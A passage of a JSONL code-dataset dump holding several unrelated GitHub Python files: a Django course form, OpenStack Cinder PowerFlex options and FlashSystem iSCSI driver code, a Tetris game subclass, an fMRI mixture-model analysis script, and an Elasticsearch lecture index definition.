None\n\n","repo_name":"npricejones/tagspace","sub_path":"tagspace/clusters/clusterfind.py","file_name":"clusterfind.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"24794250855","text":"from django import forms\n\nfrom .models import Course\n\n\nclass CourseForm(forms.ModelForm):\n title = forms.CharField(label='', widget=forms.TextInput(attrs={\n \"placeholder\": \"Your title\"\n }))\n description = forms.CharField(required=False,widget=forms.Textarea(attrs={\n \"placeholder\": \"Your description\",\n \"rows\": 20,\n \"cols\": 100,\n }))\n\n class Meta:\n model = Course\n fields = [\n 'title',\n 'description',\n 'price',\n ]\n\n def clean_title(self, *args, **kwargs):\n title = self.cleaned_data.get(\"title\")\n if \"CFE\" not in title:\n raise forms.ValidationError(\"This is not a valid title (must contain CFE)\")\n\n return title\n\n\nclass RawCourseForm(forms.Form):\n title = forms.CharField()\n description = forms.CharField()\n price = forms.DecimalField()\n","repo_name":"igorbragaia/django-quickstart","sub_path":"src/courses/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9582690975","text":"from oslo_config import cfg\n\n# deprecated options\nVXFLEXOS_REST_SERVER_PORT = \"vxflexos_rest_server_port\"\nVXFLEXOS_ROUND_VOLUME_CAPACITY = \"vxflexos_round_volume_capacity\"\nVXFLEXOS_UNMAP_VOLUME_BEFORE_DELETION = \"vxflexos_unmap_volume_before_deletion\"\nVXFLEXOS_STORAGE_POOLS = \"vxflexos_storage_pools\"\nVXFLEXOS_SERVER_API_VERSION = \"vxflexos_server_api_version\"\nVXFLEXOS_MAX_OVER_SUBSCRIPTION_RATIO = \"vxflexos_max_over_subscription_ratio\"\nVXFLEXOS_ALLOW_NON_PADDED_VOLUMES = \"vxflexos_allow_non_padded_volumes\"\nVXFLEXOS_ALLOW_MIGRATION_DURING_REBUILD = (\n \"vxflexos_allow_migration_during_rebuild\")\n\n# actual options\nPOWERFLEX_REST_SERVER_PORT = \"powerflex_rest_server_port\"\nPOWERFLEX_ROUND_VOLUME_CAPACITY = \"powerflex_round_volume_capacity\"\nPOWERFLEX_UNMAP_VOLUME_BEFORE_DELETION = (\n \"powerflex_unmap_volume_before_deletion\")\nPOWERFLEX_STORAGE_POOLS = \"powerflex_storage_pools\"\nPOWERFLEX_SERVER_API_VERSION = \"powerflex_server_api_version\"\nPOWERFLEX_MAX_OVER_SUBSCRIPTION_RATIO = \"powerflex_max_over_subscription_ratio\"\nPOWERFLEX_ALLOW_NON_PADDED_VOLUMES = \"powerflex_allow_non_padded_volumes\"\nPOWERFLEX_ALLOW_MIGRATION_DURING_REBUILD = (\n \"powerflex_allow_migration_during_rebuild\")\n\ndeprecated_opts = [\n cfg.PortOpt(VXFLEXOS_REST_SERVER_PORT,\n default=443,\n help='renamed to %s.' %\n POWERFLEX_REST_SERVER_PORT,\n deprecated_for_removal=True,\n deprecated_reason='Replaced by %s.' %\n POWERFLEX_REST_SERVER_PORT),\n cfg.BoolOpt(VXFLEXOS_ROUND_VOLUME_CAPACITY,\n default=True,\n help='renamed to %s.' %\n POWERFLEX_ROUND_VOLUME_CAPACITY,\n deprecated_for_removal=True,\n deprecated_reason='Replaced by %s.' %\n POWERFLEX_ROUND_VOLUME_CAPACITY),\n cfg.BoolOpt(VXFLEXOS_UNMAP_VOLUME_BEFORE_DELETION,\n default=False,\n help='renamed to %s.' %\n POWERFLEX_ROUND_VOLUME_CAPACITY,\n deprecated_for_removal=True,\n deprecated_reason='Replaced by %s.' %\n POWERFLEX_ROUND_VOLUME_CAPACITY),\n cfg.StrOpt(VXFLEXOS_STORAGE_POOLS,\n help='renamed to %s.' %\n POWERFLEX_STORAGE_POOLS,\n deprecated_for_removal=True,\n deprecated_reason='Replaced by %s.' 
%\n POWERFLEX_STORAGE_POOLS),\n cfg.StrOpt(VXFLEXOS_SERVER_API_VERSION,\n help='renamed to %s.' %\n POWERFLEX_SERVER_API_VERSION,\n deprecated_for_removal=True,\n deprecated_reason='Replaced by %s.' %\n POWERFLEX_SERVER_API_VERSION),\n cfg.FloatOpt(VXFLEXOS_MAX_OVER_SUBSCRIPTION_RATIO,\n # This option exists to provide a default value for the\n # PowerFlex driver which is different than the global default.\n default=10.0,\n help='renamed to %s.' %\n POWERFLEX_MAX_OVER_SUBSCRIPTION_RATIO,\n deprecated_for_removal=True,\n deprecated_reason='Replaced by %s.' %\n POWERFLEX_MAX_OVER_SUBSCRIPTION_RATIO),\n cfg.BoolOpt(VXFLEXOS_ALLOW_NON_PADDED_VOLUMES,\n default=False,\n help='renamed to %s.' %\n POWERFLEX_ALLOW_NON_PADDED_VOLUMES,\n deprecated_for_removal=True,\n deprecated_reason='Replaced by %s.' %\n POWERFLEX_ALLOW_NON_PADDED_VOLUMES),\n cfg.BoolOpt(VXFLEXOS_ALLOW_MIGRATION_DURING_REBUILD,\n default=False,\n help='renamed to %s.' %\n POWERFLEX_ALLOW_MIGRATION_DURING_REBUILD,\n deprecated_for_removal=True,\n deprecated_reason='Replaced by %s.' %\n POWERFLEX_ALLOW_MIGRATION_DURING_REBUILD),\n]\n\nactual_opts = [\n cfg.PortOpt(POWERFLEX_REST_SERVER_PORT,\n default=443,\n help='Gateway REST server port.',\n deprecated_name=VXFLEXOS_REST_SERVER_PORT),\n cfg.BoolOpt(POWERFLEX_ROUND_VOLUME_CAPACITY,\n default=True,\n help='Round volume sizes up to 8GB boundaries. '\n 'PowerFlex/VxFlex OS requires volumes to be sized '\n 'in multiples of 8GB. If set to False, volume '\n 'creation will fail for volumes not sized properly',\n deprecated_name=VXFLEXOS_ROUND_VOLUME_CAPACITY\n ),\n cfg.BoolOpt(POWERFLEX_UNMAP_VOLUME_BEFORE_DELETION,\n default=False,\n help='Unmap volumes before deletion.',\n deprecated_name=VXFLEXOS_UNMAP_VOLUME_BEFORE_DELETION),\n cfg.StrOpt(POWERFLEX_STORAGE_POOLS,\n help='Storage Pools. Comma separated list of storage '\n 'pools used to provide volumes. Each pool should '\n 'be specified as a '\n 'protection_domain_name:storage_pool_name value',\n deprecated_name=VXFLEXOS_STORAGE_POOLS),\n cfg.StrOpt(POWERFLEX_SERVER_API_VERSION,\n help='PowerFlex/ScaleIO API version. This value should be '\n 'left as the default value unless otherwise instructed '\n 'by technical support.',\n deprecated_name=VXFLEXOS_SERVER_API_VERSION),\n cfg.FloatOpt(POWERFLEX_MAX_OVER_SUBSCRIPTION_RATIO,\n # This option exists to provide a default value for the\n # PowerFlex driver which is different than the global default.\n default=10.0,\n help='max_over_subscription_ratio setting for the driver. '\n 'Maximum value allowed is 10.0.',\n deprecated_name=VXFLEXOS_MAX_OVER_SUBSCRIPTION_RATIO),\n cfg.BoolOpt(POWERFLEX_ALLOW_NON_PADDED_VOLUMES,\n default=False,\n help='Allow volumes to be created in Storage Pools '\n 'when zero padding is disabled. 
This option should '\n 'not be enabled if multiple tenants will utilize '\n 'volumes from a shared Storage Pool.',\n deprecated_name=VXFLEXOS_ALLOW_NON_PADDED_VOLUMES),\n cfg.BoolOpt(POWERFLEX_ALLOW_MIGRATION_DURING_REBUILD,\n default=False,\n help='Allow volume migration during rebuild.',\n deprecated_name=VXFLEXOS_ALLOW_MIGRATION_DURING_REBUILD),\n]\n","repo_name":"openstack/cinder","sub_path":"cinder/volume/drivers/dell_emc/powerflex/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":6641,"program_lang":"python","lang":"en","doc_type":"code","stars":628,"dataset":"github-code","pt":"66"} +{"seq_id":"9582968045","text":"import random\nimport threading\n\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\nfrom oslo_utils import excutils\n\nfrom cinder import exception\nfrom cinder.i18n import _\nfrom cinder import interface\nfrom cinder import utils\nfrom cinder.volume import configuration as conf\nfrom cinder.volume.drivers.ibm import flashsystem_common as fscommon\nfrom cinder.volume.drivers.san import san\n\nLOG = logging.getLogger(__name__)\n\nflashsystem_iscsi_opts = [\n cfg.IntOpt('flashsystem_iscsi_portid',\n default=0,\n help='Default iSCSI Port ID of FlashSystem. '\n '(Default port is 0.)')\n]\n\nCONF = cfg.CONF\nCONF.register_opts(flashsystem_iscsi_opts, group=conf.SHARED_CONF_GROUP)\n\n\n@interface.volumedriver\nclass FlashSystemISCSIDriver(fscommon.FlashSystemDriver):\n \"\"\"IBM FlashSystem iSCSI volume driver.\n\n Version history:\n\n .. code-block:: none\n\n 1.0.0 - Initial driver\n 1.0.1 - Code clean up\n 1.0.2 - Add lock into vdisk map/unmap, connection\n initialize/terminate\n 1.0.3 - Initial driver for iSCSI\n 1.0.4 - Split Flashsystem driver into common and FC\n 1.0.5 - Report capability of volume multiattach\n 1.0.6 - Fix bug #1469581, add I/T mapping check in\n terminate_connection\n 1.0.7 - Fix bug #1505477, add host name check in\n _find_host_exhaustive for FC\n 1.0.8 - Fix bug #1572743, multi-attach attribute\n should not be hardcoded, only in iSCSI\n 1.0.9 - Fix bug #1570574, Cleanup host resource\n leaking, changes only in iSCSI\n 1.0.10 - Fix bug #1585085, add host name check in\n _find_host_exhaustive for iSCSI\n 1.0.11 - Update driver to use ABC metaclasses\n 1.0.12 - Update driver to support Manage/Unmanage\n existing volume\n \"\"\"\n\n VERSION = \"1.0.12\"\n\n # ThirdPartySystems wiki page\n CI_WIKI_NAME = \"IBM_STORAGE_CI\"\n\n def __init__(self, *args, **kwargs):\n super(FlashSystemISCSIDriver, self).__init__(*args, **kwargs)\n self.configuration.append_config_values(fscommon.flashsystem_opts)\n self.configuration.append_config_values(flashsystem_iscsi_opts)\n self.configuration.append_config_values(san.san_opts)\n\n def _check_vdisk_params(self, params):\n # Check that the requested protocol is enabled\n if not params['protocol'] in self._protocol:\n msg = (_(\"'%(prot)s' is invalid for \"\n \"flashsystem_connection_protocol \"\n \"in config file. 
valid value(s) are \"\n \"%(enabled)s.\")\n % {'prot': params['protocol'],\n 'enabled': self._protocol})\n raise exception.InvalidInput(reason=msg)\n\n # Check if iscsi_ip is set when protocol is iSCSI\n if params['protocol'] == 'iSCSI' and params['iscsi_ip'] == 'None':\n msg = _(\"target_ip_address must be set in config file when \"\n \"using protocol 'iSCSI'.\")\n raise exception.InvalidInput(reason=msg)\n\n def _create_host(self, connector):\n \"\"\"Create a new host on the storage system.\n\n We create a host and associate it with the given connection\n information.\n \"\"\"\n\n LOG.debug('enter: _create_host: host %s.', connector['host'])\n\n rand_id = str(random.randint(0, 99999999)).zfill(8)\n host_name = '%s-%s' % (self._connector_to_hostname_prefix(connector),\n rand_id)\n\n ports = []\n\n if 'iSCSI' == self._protocol and 'initiator' in connector:\n ports.append('-iscsiname %s' % connector['initiator'])\n\n self._driver_assert(ports,\n (_('_create_host: No connector ports.')))\n port1 = ports.pop(0)\n arg_name, arg_val = port1.split()\n ssh_cmd = ['svctask', 'mkhost', '-force', arg_name, arg_val, '-name',\n '\"%s\"' % host_name]\n out, err = self._ssh(ssh_cmd)\n self._assert_ssh_return('successfully created' in out,\n '_create_host', ssh_cmd, out, err)\n\n for port in ports:\n arg_name, arg_val = port.split()\n ssh_cmd = ['svctask', 'addhostport', '-force',\n arg_name, arg_val, host_name]\n out, err = self._ssh(ssh_cmd)\n self._assert_ssh_return(\n (not out.strip()),\n '_create_host', ssh_cmd, out, err)\n\n LOG.debug(\n 'leave: _create_host: host %(host)s - %(host_name)s.',\n {'host': connector['host'], 'host_name': host_name})\n\n return host_name\n\n def _find_host_exhaustive(self, connector, hosts):\n LOG.debug('enter: _find_host_exhaustive hosts: %s.', hosts)\n hname = connector['host']\n hnames = [ihost[0:ihost.rfind('-')] for ihost in hosts]\n if hname in hnames:\n host = hosts[hnames.index(hname)]\n ssh_cmd = ['svcinfo', 'lshost', '-delim', '!', host]\n out, err = self._ssh(ssh_cmd)\n self._assert_ssh_return(\n out.strip(),\n '_find_host_exhaustive', ssh_cmd, out, err)\n for attr_line in out.split('\\n'):\n attr_name, foo, attr_val = attr_line.partition('!')\n if (attr_name == 'iscsi_name' and\n 'initiator' in connector and\n attr_val == connector['initiator']):\n LOG.debug(\n 'leave: _find_host_exhaustive connector: %s.',\n connector)\n return host\n else:\n LOG.warning('Host %(host)s was not found on backend storage.',\n {'host': hname})\n return None\n\n def _get_vdisk_map_properties(\n self, connector, lun_id, vdisk_name, vdisk_id, vdisk_params):\n \"\"\"Get the map properties of vdisk.\"\"\"\n\n LOG.debug(\n 'enter: _get_vdisk_map_properties: vdisk '\n '%(vdisk_name)s.', {'vdisk_name': vdisk_name})\n\n preferred_node = '0'\n IO_group = '0'\n\n # Get preferred node and other nodes in I/O group\n preferred_node_entry = None\n io_group_nodes = []\n for k, node in self._storage_nodes.items():\n if vdisk_params['protocol'] != node['protocol']:\n continue\n if node['id'] == preferred_node:\n preferred_node_entry = node\n if node['IO_group'] == IO_group:\n io_group_nodes.append(node)\n\n if not io_group_nodes:\n msg = (_('No node found in I/O group %(gid)s for volume %(vol)s.')\n % {'gid': IO_group, 'vol': vdisk_name})\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n if not preferred_node_entry:\n # Get 1st node in I/O group\n preferred_node_entry = io_group_nodes[0]\n LOG.warning('_get_vdisk_map_properties: Did not find a '\n 'preferred node for 
vdisk %s.', vdisk_name)\n properties = {\n 'target_discovered': False,\n 'target_lun': lun_id,\n 'volume_id': vdisk_id,\n }\n\n type_str = 'iscsi'\n if preferred_node_entry['ipv4']:\n ipaddr = preferred_node_entry['ipv4'][0]\n else:\n ipaddr = preferred_node_entry['ipv6'][0]\n iscsi_port = self.configuration.target_port\n properties['target_portal'] = '%s:%s' % (ipaddr, iscsi_port)\n properties['target_iqn'] = preferred_node_entry['iscsi_name']\n\n LOG.debug(\n 'leave: _get_vdisk_map_properties: vdisk '\n '%(vdisk_name)s.', {'vdisk_name': vdisk_name})\n\n return {'driver_volume_type': type_str, 'data': properties}\n\n @utils.synchronized('flashsystem-init-conn', external=True)\n def initialize_connection(self, volume, connector):\n \"\"\"Perform work so that an iSCSI connection can be made.\n\n To be able to create an iSCSI connection from a given host to a\n volume, we must:\n 1. Translate the given iSCSI name to a host name\n 2. Create new host on the storage system if it does not yet exist\n 3. Map the volume to the host if it is not already done\n 4. Return the connection information for relevant nodes (in the\n proper I/O group)\n\n \"\"\"\n\n LOG.debug(\n 'enter: initialize_connection: volume %(vol)s with '\n 'connector %(conn)s.', {'vol': volume, 'conn': connector})\n\n vdisk_name = volume['name']\n vdisk_id = volume['id']\n vdisk_params = self._get_vdisk_params(volume['volume_type_id'])\n\n self._wait_vdisk_copy_completed(vdisk_name)\n\n self._driver_assert(\n self._is_vdisk_defined(vdisk_name),\n (_('vdisk %s is not defined.')\n % vdisk_name))\n\n lun_id = self._map_vdisk_to_host(vdisk_name, connector)\n\n properties = {}\n try:\n properties = self._get_vdisk_map_properties(\n connector, lun_id, vdisk_name, vdisk_id, vdisk_params)\n except exception.VolumeBackendAPIException:\n with excutils.save_and_reraise_exception():\n self.terminate_connection(volume, connector)\n LOG.error('Failed to collect return properties for '\n 'volume %(vol)s and connector %(conn)s.',\n {'vol': volume, 'conn': connector})\n\n LOG.debug(\n 'leave: initialize_connection:\\n volume: %(vol)s\\n connector '\n '%(conn)s\\n properties: %(prop)s.',\n {'vol': volume,\n 'conn': connector,\n 'prop': properties})\n\n return properties\n\n @utils.synchronized('flashsystem-term-conn', external=True)\n def terminate_connection(self, volume, connector, **kwargs):\n \"\"\"Cleanup after connection has been terminated.\n\n When we clean up a terminated connection between a given connector\n and volume, we:\n 1. Translate the given connector to a host name\n 2. Remove the volume-to-host mapping if it exists\n 3. 
Delete the host if it has no more mappings (hosts are created\n automatically by this driver when mappings are created)\n \"\"\"\n LOG.debug(\n 'enter: terminate_connection: volume %(vol)s with '\n 'connector %(conn)s.',\n {'vol': volume, 'conn': connector})\n\n vdisk_name = volume['name']\n self._wait_vdisk_copy_completed(vdisk_name)\n host_name = self._unmap_vdisk_from_host(vdisk_name, connector)\n # checking if host_name none, if not then, check if the host has\n # any mappings, if not the host gets deleted.\n if host_name:\n if not self._get_hostvdisk_mappings(host_name):\n self._delete_host(host_name)\n\n LOG.debug(\n 'leave: terminate_connection: volume %(vol)s with '\n 'connector %(conn)s.', {'vol': volume, 'conn': connector})\n\n return {'driver_volume_type': 'iscsi'}\n\n def _get_iscsi_ip_addrs(self):\n \"\"\"get ip address of iSCSI interface.\"\"\"\n\n LOG.debug('enter: _get_iscsi_ip_addrs')\n\n cmd = ['svcinfo', 'lsportip']\n generator = self._port_conf_generator(cmd)\n header = next(generator, None)\n if not header:\n return\n\n for key in self._storage_nodes:\n if self._storage_nodes[key]['config_node'] == 'yes':\n node = self._storage_nodes[key]\n break\n\n if node is None:\n msg = _('No config node found.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n for port_data in generator:\n try:\n port_ipv4 = port_data['IP_address']\n port_ipv6 = port_data['IP_address_6']\n state = port_data['state']\n speed = port_data['speed']\n except KeyError:\n self._handle_keyerror('lsportip', header)\n if port_ipv4 == self.configuration.target_ip_address and (\n port_data['id'] == (\n str(self.configuration.flashsystem_iscsi_portid))):\n if state not in ('configured', 'online'):\n msg = (_('State of node is wrong. Current state is %s.')\n % state)\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n if state in ('configured', 'online') and speed != 'NONE':\n if port_ipv4:\n node['ipv4'].append(port_ipv4)\n if port_ipv6:\n node['ipv6'].append(port_ipv6)\n break\n if not (len(node['ipv4']) or len(node['ipv6'])):\n msg = _('No ip address found.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n LOG.debug('leave: _get_iscsi_ip_addrs')\n\n def do_setup(self, ctxt):\n \"\"\"Check that we have all configuration details from the storage.\"\"\"\n\n LOG.debug('enter: do_setup')\n\n self._context = ctxt\n\n # Get data of configured node\n self._get_node_data()\n\n # Get the iSCSI IP addresses of the FlashSystem nodes\n self._get_iscsi_ip_addrs()\n\n for k, node in self._storage_nodes.items():\n if self.configuration.flashsystem_connection_protocol == 'iSCSI':\n if (len(node['ipv4']) or len(node['ipv6']) and\n len(node['iscsi_name'])):\n node['protocol'] = 'iSCSI'\n\n self._protocol = 'iSCSI'\n\n # Set for vdisk synchronization\n self._vdisk_copy_in_progress = set()\n self._vdisk_copy_lock = threading.Lock()\n self._check_lock_interval = 5\n\n LOG.debug('leave: do_setup')\n\n def _build_default_params(self):\n protocol = self.configuration.flashsystem_connection_protocol\n if protocol.lower() == 'iscsi':\n protocol = 'iSCSI'\n return {\n 'protocol': protocol,\n 'iscsi_ip': self.configuration.target_ip_address,\n 'iscsi_port': self.configuration.target_port,\n 'iscsi_ported': self.configuration.flashsystem_iscsi_portid,\n }\n\n def validate_connector(self, connector):\n \"\"\"Check connector for enabled protocol.\"\"\"\n valid = False\n if 'iSCSI' == self._protocol and 'initiator' in connector:\n valid = True\n if not valid:\n 
LOG.error('The connector does not contain the '\n 'required information: initiator is missing')\n raise exception.InvalidConnectorException(missing=(\n 'initiator'))\n","repo_name":"openstack/cinder","sub_path":"cinder/volume/drivers/ibm/flashsystem_iscsi.py","file_name":"flashsystem_iscsi.py","file_ext":"py","file_size_in_byte":14922,"program_lang":"python","lang":"en","doc_type":"code","stars":628,"dataset":"github-code","pt":"66"} +{"seq_id":"72773890771","text":"from tetris import *\n\nclass CTetris((Tetris)):\n\n def overlapped(self):\n shape = self.currBlk.get_array()\n block = self.tempBlk.get_array()\n \n for y in range(len(shape)):\n for x in range(len(shape[y])):\n if shape[y][x] != 0 and shape[y][x] != block[y][x]:\n return True\n return False\n\n def accept(self, key):\n self.state = TetrisState.Running\n\n if key >= '0' and key <= '6':\n if self.justStarted == False:\n self.deleteFullLines()\n self.iScreen = Matrix(self.oScreen)\n self.idxBlockType = int(key)\n self.idxBlockDegree = 0\n self.currBlk = Tetris.setOfBlockObjects[self.idxBlockType][self.idxBlockDegree]\n self.top = 0\n self.left = Tetris.iScreenDw + self.iScreenDx//2 - self.currBlk.get_dx()//2\n self.tempBlk = self.iScreen.clip(self.top, self.left, self.top+self.currBlk.get_dy(), self.left+self.currBlk.get_dx())\n self.tempBlk = self.tempBlk + self.currBlk\n self.justStarted = False\n print()\n\n if self.overlapped():\n self.state = TetrisState.Finished\n self.oScreen = Matrix(self.iScreen)\n self.oScreen.paste(self.tempBlk, self.top, self.left)\n return self.state\n elif key == 'q':\n pass\n elif key == 'a': # move left\n self.left -= 1\n elif key == 'd': # move right\n self.left += 1\n elif key == 's': # move down\n self.top += 1\n elif key == 'w': # rotate the block clockwise\n self.idxBlockDegree = (self.idxBlockDegree + 1) % Tetris.nBlockDegrees\n self.currBlk = Tetris.setOfBlockObjects[self.idxBlockType][self.idxBlockDegree]\n elif key == ' ': # drop the block\n while not self.overlapped(): \n self.top += 1\n self.tempBlk = self.iScreen.clip(self.top, self.left, self.top+self.currBlk.get_dy(), self.left+self.currBlk.get_dx())\n self.tempBlk = self.tempBlk + self.currBlk\n else:\n print('Wrong key!!!')\n \n self.tempBlk = self.iScreen.clip(self.top, self.left, self.top+self.currBlk.get_dy(), self.left+self.currBlk.get_dx())\n self.tempBlk = self.tempBlk + self.currBlk\n\n if self.overlapped(): ## 벽 충돌시 undo 수행\n if key == 'a': # undo: move right\n self.left += 1\n elif key == 'd': # undo: move left\n self.left -= 1\n elif key == 's': # undo: move up\n self.top -= 1\n self.state = TetrisState.NewBlock\n elif key == 'w': # undo: rotate the block counter-clockwise\n self.idxBlockDegree = (self.idxBlockDegree - 1) % Tetris.nBlockDegrees\n self.currBlk = Tetris.setOfBlockObjects[self.idxBlockType][self.idxBlockDegree]\n elif key == ' ': # undo: move up\n self.top -= 1\n self.state = TetrisState.NewBlock\n \n self.tempBlk = self.iScreen.clip(self.top, self.left, self.top+self.currBlk.get_dy(), self.left+self.currBlk.get_dx())\n self.tempBlk = self.tempBlk + self.currBlk\n\n self.oScreen = Matrix(self.iScreen)\n self.oScreen.paste(self.tempBlk, self.top, self.left)\n\n return self.state\n\n def deleteFullLines(self):\n array = self.oScreen.get_array()\n \n for y in range(self.oScreen.get_dy()-CTetris.iScreenDw-1, 0, -1):\n for x in range(CTetris.iScreenDw, self.oScreen.get_dx()-CTetris.iScreenDw):\n if array[y][x] == 0:\n break\n else:\n for line in range(y, 0, -1):\n array[line] = array[line-1][ : ]\n for x in 
range(CTetris.iScreenDw, self.oScreen.get_dx()-CTetris.iScreenDw):\n array[0][x] = 0\n self.oScreen = Matrix(array)\n return self.deleteFullLines()\n\n return\n\n\n### end of class CTetris():\n","repo_name":"20234037/sweng2021","sub_path":"pytet_v0.4/ctetris.py","file_name":"ctetris.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31958831752","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 24 14:03:13 2017\n@author: allera\n\"\"\"\n\n\nimport sys\nimport os\nimport numpy as np\nimport nibabel as nib\nimport time\n\n\n#Add the toolbox to path\ntoolbox_path = \"/Users/alblle/allera_version_controlled_code/One_Dim_Mixture_Models/python/code\"\nsys.path.append(os.path.join(os.path.abspath(toolbox_path))) \nfrom Mixture_Model_1Dim import Mixture_Model_1Dim\nInferences_possibilities=['Method of moments','Maximum Likelihood','Variational Bayes'] \n \n\n\ndata_path='/Users/alblle/Dropbox/POSTDOC/MYPAPERS/OHBM_journal_2020_mix_models_paper/new_code/Raimon_templates/Raipru_11_ICs_2mm.nii.gz' \n\n\n\n#wd=os.getcwd()\n#completeName = os.path.join(wd, 'Results', \"OUTPUT_IMAGENAME\") #name of directory to save results\"\n#completeName = \"OUTDIR\"\n\n#os.mkdir(completeName)\nimg = nib.load(data_path)\ndata = img.get_data()\n\norigsize=data.shape\nIC=np.reshape(data,[data.shape[0]* data.shape[1]* data.shape[2],data.shape[3]], \"F\" )\nnumVoxels=IC.shape[0]\nnumICs=IC.shape[1]\n\n\nN_models=2 #GGG, GII\nN_Inference_pos=len(Inferences_possibilities)\n\n\n\nMixProp=np.zeros([numICs,N_models,N_Inference_pos,3]) \nCOST=np.zeros([numICs,N_models,N_Inference_pos]);# 6 models\nThreshold=np.zeros([numICs,N_models,N_Inference_pos,2]);# 6 models, 2 thresholds per model\nIts=np.zeros([numICs,N_models,N_Inference_pos])\n\n\n#mixture options\ninit_params=[0,1,5,2,-5,2]\n\nmaxits=500\ntol=0.00000001\n\n\n#basis_dict={MixProp}\n#Results={'Gauss_Gamma':}\nif 1:\n\n for icnumber in range (0,numICs): \n myIC=IC[:,icnumber]\n x=np.copy(myIC)\n \n \n NoBrainVoxels=np.argwhere(x==0)\n BrainVoxels=np.argwhere(x!=0)\n #remove zero voxels from x\n all_x=x;#all voxels\n PICAMAP=np.zeros(all_x.shape[0])\n x=x[BrainVoxels]#maxed voxels\n x=np.squeeze(np.divide(x-x.mean(),x.std()))\n \n \n \n # Gauss Gamma-Gamma\n Number_of_Components=3\n init_pi=np.divide(np.ones(Number_of_Components),Number_of_Components)\n Components_Model_types=[['Gauss','Gamma','-Gamma'],['Gauss','InvGamma','-InvGamma']] #Each component can be Gauss, Gamma, InvGamma, -Gamma, -InvGamma\n \n for dist_type in range(N_models):\n \n Components_Model=Components_Model_types[dist_type]\n \n for inference_type in range(N_Inference_pos):\n \n Inference =Inferences_possibilities[inference_type]\n \n opts={'Inference':Inference,'Number_of_Components':Number_of_Components,'Components_Model':Components_Model,\n 'init_params':init_params,'maxits':maxits,'tol':tol,'init_pi':init_pi}\n \n t = time.time()\n Model = Mixture_Model_1Dim(x, opts)\n \n \n COST[icnumber,dist_type,inference_type] = time.time() - t\n MixProp[icnumber,dist_type,inference_type,:]= Model['Mixing Prop.']\n Its[icnumber,dist_type,inference_type]=Model['its']\n \n resp=np.squeeze(np.asarray(Model['Final responsibilities']))\n qq=resp[0,:]\n qq[qq>0.5]=1\n qq[resp[1,:]>0.5]=2\n if np.sum(qq==2)>0:\n Threshold[icnumber,dist_type,inference_type,0]=x[qq==2].min()\n else:\n Threshold[icnumber,dist_type,inference_type,0]=x.max()\n \n if Number_of_Components==3:\n qq[resp[2,:]>0.5]=3\n if 
np.sum(qq==3)>0:\n Threshold[icnumber,dist_type,inference_type,1]=x[qq==3].max()\n else:\n Threshold[icnumber,dist_type,inference_type,1]=x.min()\n \n \n \n print(icnumber)\n print(Components_Model)\n print(Inference)\n print(COST[icnumber,dist_type,inference_type])\n print(MixProp[icnumber,dist_type,inference_type,:])\n print(Its[icnumber,dist_type,inference_type])\n #print(Threshold[icnumber,dist_type,inference_type,:])\n \n #\tfind classifiers threshodls\n # ng=np.where(src1['q'] ==2);\n # ps=np.where(src1['q'] ==1);\n # if np.size(ps)!=0:\n # Threshold[icnumber][0][0]=np.min(x[ps])\n # if np.size(ng)!=0:\n # Threshold[icnumber][0][1]=np.max(x[ng])\n \n \nfor dist_type in range(N_models):\n \n \n for inference_type in range(N_Inference_pos):\n \n print(COST[:,dist_type,inference_type]) \n print(MixProp[:,dist_type,inference_type,:])\n\nnp.mean(COST,0)\nnp.mean(MixProp,0)\n#savedfile= os.path.join(completeName,'RESULTS.mat')\n#Results=[]\n#Results.append({'Iterations': Its, 'MixingProps' : MixProp, 'Thresholds' :Threshold, 'cost':COST})\n#sio.savemat(savedfile,{'Results':Results }) \n \n \n \n\n\n\t\n\n\n\n\n","repo_name":"allera/One_Dim_Mixture_Models","sub_path":"python/examples/Mix_Mod_RSN.py","file_name":"Mix_Mod_RSN.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25793970451","text":"from django_elasticsearch_dsl import Document, fields\nfrom django_elasticsearch_dsl.registries import registry\nfrom api.models import Lecture, Author, Event, Category\n\nfrom elasticsearch_dsl import analyzer, tokenizer\n\n# for other languages\neng_analyzer = analyzer('eng_analyzer',\n tokenizer=tokenizer('trigram', 'ngram', min_gram=3, max_gram=3),\n filter=['lowercase', 'asciifolding'] # New filter added\n)\n\n@registry.register_document\nclass LectureDocument(Document):\n author = fields.ObjectField(properties={\n 'name': fields.TextField(analyzer=eng_analyzer,),\n 'views': fields.IntegerField(),\n 'id': fields.IntegerField(),\n })\n\n categories = fields.ListField(\n fields.ObjectField(properties={\n 'name': fields.TextField(),\n }))\n\n event = fields.ObjectField(properties={\n 'title': fields.TextField(analyzer=eng_analyzer,),\n 'description': fields.TextField(analyzer=eng_analyzer,),\n 'caption': fields.TextField(analyzer=eng_analyzer,),\n })\n\n title = fields.TextField(\n analyzer=eng_analyzer,\n )\n description = fields.TextField(\n analyzer=eng_analyzer,\n )\n\n class Index:\n # Name of the Elasticsearch index\n name = 'lectures'\n # See Elasticsearch Indices API reference for available settings\n settings = {'number_of_shards': 1,\n 'number_of_replicas': 0}\n\n class Django:\n model = Lecture # The model associated with this Document\n\n # The fields of the model you want to be indexed in Elasticsearch\n fields = [\n #'title',\n #'description',\n 'views',\n 'published',\n 'video',\n 'thumbnail',\n 'audio',\n 'id'\n ]\n # Optional: to ensure the Car will be re-saved when Manufacturer or Ad is updated\n related_models = [Author, Event, Category]\n\n # Ignore auto updating of Elasticsearch when a model is saved\n # or deleted:\n # ignore_signals = True\n\n # Don't perform an index refresh after every update (overrides global setting):\n # auto_refresh = False\n\n # Paginate the django queryset used to populate the index with the specified size\n # (by default it uses the database driver's default setting)\n # queryset_pagination = 5000\n\n def get_queryset(self):\n \"\"\"Not mandatory 
